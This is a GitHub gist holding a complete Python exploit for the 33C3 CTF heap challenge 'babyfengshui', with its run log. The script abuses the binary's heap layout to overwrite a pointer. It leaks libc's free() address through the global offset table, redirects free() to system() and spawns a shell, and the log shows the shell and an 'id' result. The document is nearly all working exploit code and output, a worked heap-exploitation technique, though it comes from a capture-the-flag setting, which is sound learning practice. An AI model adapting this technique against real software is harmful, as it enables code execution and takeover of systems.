Created
January 1, 2017 09:13
-
-
Save inaz2/4c3339c0c7e247fe87ef6bfdd6aa9d70 to your computer and use it in GitHub Desktop.
33C3 CTF babyfengshui (Pwn 150) / http://katc.hateblo.jp/entry/2016/12/30/164753
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from minipwn import * | |
| def add_user(s, size_desc, name, text_len, text): | |
| recvuntil(s, 'Action: ') | |
| sendline(s, '0') | |
| recvuntil(s, 'size of description: ') | |
| sendline(s, str(size_desc)) | |
| recvuntil(s, 'name: ') | |
| sendline(s, name) | |
| recvuntil(s, 'text length: ') | |
| sendline(s, str(text_len)) | |
| recvuntil(s, 'text: ') | |
| sendline(s, text) | |
| def delete_user(s, index): | |
| recvuntil(s, 'Action: ') | |
| sendline(s, '1') | |
| recvuntil(s, 'index: ') | |
| sendline(s, str(index)) | |
| def display_user(s, index): | |
| recvuntil(s, 'Action: ') | |
| sendline(s, '2') | |
| recvuntil(s, 'index: ') | |
| sendline(s, str(index)) | |
| recvuntil(s, 'name: ') | |
| name = recvline(s) | |
| recvuntil(s, 'description: ') | |
| desc = recvline(s) | |
| return (name, desc) | |
| def update_user_desc(s, index, text_len, text): | |
| recvuntil(s, 'Action: ') | |
| sendline(s, '3') | |
| recvuntil(s, 'index: ') | |
| sendline(s, str(index)) | |
| recvuntil(s, 'text length: ') | |
| sendline(s, str(text_len)) | |
| recvuntil(s, 'text: ') | |
| sendline(s, text) | |
| s = connect_process(['./babyfengshui']) | |
| #raw_input() | |
| got_free = 0x804b010 | |
| print "[+] allocate user[0], user[1]" | |
| add_user(s, 8, 'AAAAAAAA', 8, 'BBBBBBBB') # index 0 | |
| add_user(s, 8, 'CCCCCCCC', 8, 'DDDDDDDD') # index 1 | |
| print "[+] free user[0]" | |
| delete_user(s, 0) | |
| print "[+] allocate user[2] and overwrite user[1].ptr_text to got_free" | |
| add_user(s, 0x10, 'E'*0x10, 0x100, '/bin/sh\x00'.ljust(0x98)+p32(got_free)) # index 2 | |
| """ | |
| $ nm -D /lib32/libc.so.6 | grep -e free$ -e system$ | |
| 000705b0 T free | |
| 0003a940 W system | |
| """ | |
| name, desc = display_user(s, 1) | |
| libc_free = u32(desc[:4]) | |
| print "[+] libc_free = %x" % libc_free | |
| libc_system = libc_free - 0x000705b0 + 0x0003a940 | |
| print "[+] libc_system = %x" % libc_system | |
| print "{+] overwrite got_free to libc_system" | |
| update_user_desc(s, 1, 4, p32(libc_system)) | |
| print "[+] trigger free(user[2].ptr_text)" | |
| delete_user(s, 2) | |
| print "[+] got a shell!" | |
| interact(s) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python babyfengshui.py | |
| [+] allocate user[0], user[1] | |
| [+] free user[0] | |
| [+] allocate user[2] and overwrite user[1].ptr_text to got_free | |
| [+] libc_free = f762e5b0 | |
| [+] libc_system = f75f8940 | |
| {+] overwrite got_free to libc_system | |
| [+] trigger free(user[2].ptr_text) | |
| [+] got a shell! | |
| id | |
| uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment